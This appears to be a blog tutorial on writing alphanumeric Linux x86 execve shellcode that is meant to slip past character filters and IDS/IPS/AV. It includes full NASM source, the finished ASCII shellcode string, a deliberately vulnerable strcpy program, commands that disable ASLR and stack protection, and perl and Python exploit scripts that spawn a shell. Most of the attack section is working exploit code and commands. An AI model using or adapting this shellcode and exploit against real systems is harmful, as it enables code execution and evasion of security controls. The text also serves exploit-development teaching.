Linux Shellcode - Alphanumeric Execve()
Intruduction
Back to shellcode argument, today we will speak about alphanumeric shellcode. This argument was suggested to me from @nahualito (ty!), some weeks ago and i have to admit it took me crazy sometimes but it was also a lot fun. The scope of the task is to create a shellcode completely of alphanumeric characters. The reason of this madness is because
there are several filtering schemes out there being employed by programs that only allow alphanumeric characters to be passed into their buffer
an also
(Alphanumeric) shellcodes bypasses many character filters and is somewhat easy to learn due to the fact that many ascii instructions are only one or two byte instructions. The smaller the instructions, the more easily obfuscated and randomized they are. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so many times it is important to utilize the smallest possible combination of opcodes. In other cases, more buffer space is available and things like ascii art shellcode are more plausible.
So we can resume the “Art” of create Alphanumeric Shellcode like an extreme polymorphism that allow us to bypass IDS/IPS/AV agents and this is, at the end, our scope.
Allowed instructions
The term “alphanumeric” speaks itself, we want to build a shellcode but only with instructions that has opcode fallen in the alphanumeric character range and they can be resumed in this table
hexadecimal opcode | char | instruction |
---|---|---|
30 </r> | ‘0’ | xor <r/m8>, |
31 </r> | ‘1’ | xor <r/m32>, |
32 </r> | ‘2’ | xor |
33 </r> | ‘3’ | xor |
34 |
‘4’ | xor al, |
35 |
‘5’ | xor eax, |
36 | ‘6’ | ss: (Segment Override Prefix) |
37 | ‘7’ | aaa |
38 </r> | ‘8’ | cmp <r/m8>, |
39 </r> | ‘9’ | cmp <r/m32>, |
41 | ‘A’ | inc ecx |
42 | ‘B’ | inc edx |
43 | ‘C’ | inc ebx |
44 | ‘D’ | inc esp |
45 | ‘E’ | inc ebp |
46 | ‘F’ | inc esi |
47 | ‘G’ | inc edi |
48 | ‘H’ | dec eax |
49 | ‘I’ | dec ecx |
4A | ‘J’ | dec edx |
4B | ‘K’ | dec ebx |
4C | ‘L’ | dec esp |
4D | ‘M’ | dec ebp |
4E | ‘N’ | dec esi |
4F | ‘O’ | dec edi |
50 | ‘P’ | push eax |
51 | ‘Q’ | push ecx |
52 | ‘R’ | push edx |
53 | ‘S’ | push ebx |
54 | ‘T’ | push esp |
55 | ‘U’ | push ebp |
56 | ‘V’ | push esi |
57 | ‘W’ | push edi |
58 | ‘X’ | pop eax |
59 | ‘Y’ | pop ecx |
5A | ‘Z’ | pop edx |
61 | ‘a’ | popa |
62 <…> | ‘b’ | bound <…> |
63 <…> | ‘c’ | arpl <…> |
64 | ‘d’ | fs: (Segment Override Prefix) |
65 | ‘e’ | gs: (Segment Override Prefix) |
66 | ‘f’ | o16: (Operand Size Override) |
67 | ‘g’ | a16: (Address Size Override) |
68 |
‘h’ | push |
69 <…> | ‘i’ | imul <…> |
6A |
‘j’ | push |
6B <…> | ‘k’ | imul <…> |
6C <…> | ‘l’ | insb <…> |
6D <…> | ‘m’ | insd <…> |
6E <…> | ‘n’ | outsb <…> |
6F <…> | ‘o’ | outsd <…> |
70 |
‘p’ | jo |
71 |
‘q’ | jno |
72 |
‘r’ | jb |
73 |
’s’ | jae |
74 |
‘t’ | je |
75 |
‘u’ | jne |
76 |
‘v’ | jbe |
77 |
‘w’ | ja |
78 |
‘x’ | js |
79 |
‘y’ | jns |
7A |
‘z’ | jp |
What can we directly deduct of all this?
- no “mov” instructions: we need to find another way to manipulate our data.
- no interesting arithmetic instructions (“add”,”sub”,…): we can only use DEC and INC and we can’t use INC with the EAX register.
- the “xor” instruction: we can use XOR with bytes and doublewords very interesting for basic crypto stuff.
- “PUSH”/”POP”/”POPAD” INSTRUCTIONS: we can push bytes and doublewords directly on the stack and we can only use POP with the EAX,ECX and EDX registers, it seems we’re going to play again with the stack.
- the “o16” operand size override: we can also achieve 16 bits manipulations with this instruction prefix.
- “jmp” and “cmp” instructions: we can realize some comparisons but we can’t directly use constant values with CMP.
Not so much eh?! Ah and obviously don’t forget that operands of these instructions (/r, imm8, imm32, disp8 and disp32) must also remain alphanumeric. It may make our task once again more complicated…
First alphanumeric instructions
No panic, we can obtain a shellcode with a little of creativity. The simple idea behind is to store all that we need on the stack and lastly use the POPAD instruction to load the right things in the right places
For the lord of simplicity of our shellcode we’ll take the simpliest Linux shellcode to manipulate, the execve()
shellcode.
Our shellcode should work for this purpose:
cdq ; xor edx
mul edx ; xor eax
lea ecx, [eax] ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push hs/ in stack
push edi ; push nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80
The first 3 instructions serves us to put 0 on our registers but as saw we can’t directly use this instruction, but we can use a polymorphism to do the same work with PUSh, POP and XOR, using the stack
push 0x30 ; push 0x30 on the stack
pop eax ; place 0x30 in EAX
xor al, 0x30 ; xor EAX with 0x30 to obtain 0
push eax ; put 0 on the stack
push edx ; put 0
Nice, now we have to put on the stack the /bin//sh string that will be loaded in EBX register, for this purpose we need to use a XOR starting from 4 letters like XXsh and trasform it in //sh.
A review on XOR logic is usefull here:
- 1 XOR 1 = 0
- 0 XOR 0 = 0
- 1 XOR 0 = 1
so making some binary calculations we can find that XXsh in binary is 01011000 01011000 01110011 01101000
and we need //sh that is 00101111 00101111 01110011 01101000
, what we need is the char to XOR with XXsh to obtain //sh
X X s h
01011000 01011000 01110011 01101000
xor
01110111 01110111 01110011 01101000 <------
-----------------------------------
00101111 00101111 01110011 01101000
/ / s h
The result is 01110111 01110111
or the equivalent hex 77 77
or the equivalent chars ww, so we now prepare the asm code to
push 0x68735858 ; push XXsh
pop eax ; put XXsh on EAX
xor ax, 0x7777 ; xor with ww
push eax ; put //sh on the stack
push 0x30 ;
pop eax ; xor the eax to 0
xor al, 0x30 ;
Now we can do a more simple job with /bin, using 0bin in EAX, decremting it by 1 and putting it on the stack after //sh
xor eax, 0x6e696230 ; push 0bin
dec eax
push eax
Now we have the basic elements for the execve, it’s time to load everything in the registers using PUSHAD/POPAD. PUSHAD isn’t in the table but POPAD is, so what we need to do is to emulate a PUSHAD and then call a POPAD. PUSHAD is an instruction that load registers on the stack in this order: EAX, ECX, EDX, EBX, ESP, EBP, ESI, and EDI Our PUSHAD is a little bit different: EDX, ECX, EBX, EAX, ESP, EBP, ESI, EDI. In this manner when we call POPAD we will put all the things in the right places.
PUSHAD instruction | Personalized PUSHAD instruction |
---|---|
PUSH EAX | PUSH EDX (0x0) |
PUSH ECX | PUSH ECX |
PUSH EDX | PUSH EBX |
PUSH EBX | PUSH EAX (%esp) |
PUSH ESP | PUSH ESP |
PUSH EBP | PUSH EBP |
PUSH ESI | PUSH ESI |
PUSH EDI | PUSH EDI |
So let’s prepare the code:
; pushad/popad to place /bin/sh in EBX register
push esp
pop eax
push edx
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad
push eax
pop ecx
push ebx
The other things we need is the 0xb
value in the EAX register, for that purpose we can find a value or more to xor with 0 to obtain 0xb. Doing the same work as for XXsh we can find that 0x4a
and after 0x41
can help us
xor al, 0x4a
xor al, 0x41
Now remain the last and the most tedious thing. The int 0x80
syscall that trig our shellcode. We can’t use the int instruction so we need to invent another trick.
The int 0x80
has the opcode 0xcd 0x80
so we can save the opcode in the stack and jump in that place to trig the syscall. To do that we can use some binary maths and another technique:
- starting from EAX xored to 0
- decrement EAX by 1 to obtain 0xffffffff
- xor AX with 0x4f73
- xor AX with 0x3041
- obtain 0xffff80cd
- push EAX on the stack
11111111 11111111 - Begin
01000001 00110000 – XOR #1
10111110 11001111 – Result of XOR #1
01110011 01001111 – XOR #2
11001101 10000000 - Result of XOR #2 ($0xcd & $0x80)
dec eax ; 0xffffffff in EAX
xor ax, 0x4f73 ;
xor ax, 0x3041 ; 0xffff80cd in EAX
push eax ; put it on the stack
The last problem to solve is that 0xffff80cd must be called as last instruction so living in little endian we need to push the value as first thing. We can summerize the execution with this schema
The Shellcode
global _start
section .text
_start:
; int 0x80 ------------
push 0x30
pop eax
xor al, 0x30
push eax
pop edx
dec eax
xor ax, 0x4f73
xor ax, 0x3041
push eax
push edx
pop eax
;----------------------
push edx
push 0x68735858
pop eax
xor ax, 0x7777
push eax
push 0x30
pop eax
xor al, 0x30
xor eax, 0x6e696230
dec eax
push eax
; pushad/popad to place /bin/sh in EBX register
push esp
pop eax
push edx
push ecx
push ebx
push eax
push esp
push ebp
push esi
push edi
popad
push eax
pop ecx
push ebx
xor al, 0x4a
xor al, 0x41
For comodity we can transfer the shellcode from nasm to ASCII text:
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
Now we need a simple buffer overflow that permit us to load and execute the shellcode. Let’s use a simple C program (bof.c)
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]){
char buffer[128];
strcpy(buffer, argv[1]);
return 0;
}
When you test it on new kernels remember to disable the randomize_va_space and to compile the C program with execstack enabled and the stack protector disabled
bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sysctl -p
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g bof.c -o bof
Next testing the bof program we found that the buffer overflow with EIP overwrite appens with 136 bytes of input, so doing a little math here we can know that:
136 - 66 (shellcode) - 4 (EIP address overwrite) = 66 bytes
so we can pass the first 6 NOP bytes + 66 shellcode bytes + 4 EIP address redirection bytes. Using Peda we have first to find the adress to land to.
As we can see in this case we can choose an adress at the end of NOP zone before our shellcode so 0xbffff788
. Now we can observe what happens in the stack when we use this address
[------------------------------------stack-------------------------------------]
0000| 0xbffff52c --> 0xbffff530 ("/bin//sh")
0004| 0xbffff530 ("/bin//sh")
0008| 0xbffff534 ("//sh")
0012| 0xbffff538 --> 0x0
0016| 0xbffff53c --> 0xffff80cd
0020| 0xbffff540 --> 0x0
0024| 0xbffff544 --> 0xbffff5d4 --> 0xbffff728 ("/home/bolo/alphanumeric/bof")
0028| 0xbffff548 --> 0xbffff5e0 --> 0xbffff7d4 ("LC_PAPER=it_IT.UTF-8")
[------------------------------------------------------------------------------]
As we can see we execute perfectly our shellcode since we have to execute it with the 0xffff80cd
(int 0x80) instruction. We can see also that the instruction is down 16 words in the stack. So now we can INC ESP 16 times to move the 0xffff80cd
address at the top of the stack. INC ESP is in our table of instrctions and has opcdoe 0x44 or “D”.
Last thing, call the 0xffff80cd
with a JMP ESP instruction. I know it is not in the table of our approved instruction and that’s the last trick: the JMP ESP opcode is \xff\xe4
and we can put this opcode just before the return address and not inside the shellcode.
So lastly our command is that
./bof `perl -e 'print "\x90"x48 . "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" . "D"x16 . "\xff\xe4\x79\xf7\xff\xbf"'`
Putting all toghether in a python script and execute it
#!/usr/bin/python
import os
print "[*] Loading NOP"
z = "\x90"*48
print "[*] Loading alphanumeric"
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
print "[*] Loading syscall"
z += "D"*16
print "[*] Loading JMP and landing address"
z += "\xff\xe4\x79\xf7\xff\xbf"
print "[*] Popping the shell..."
os.system("./bof " + z)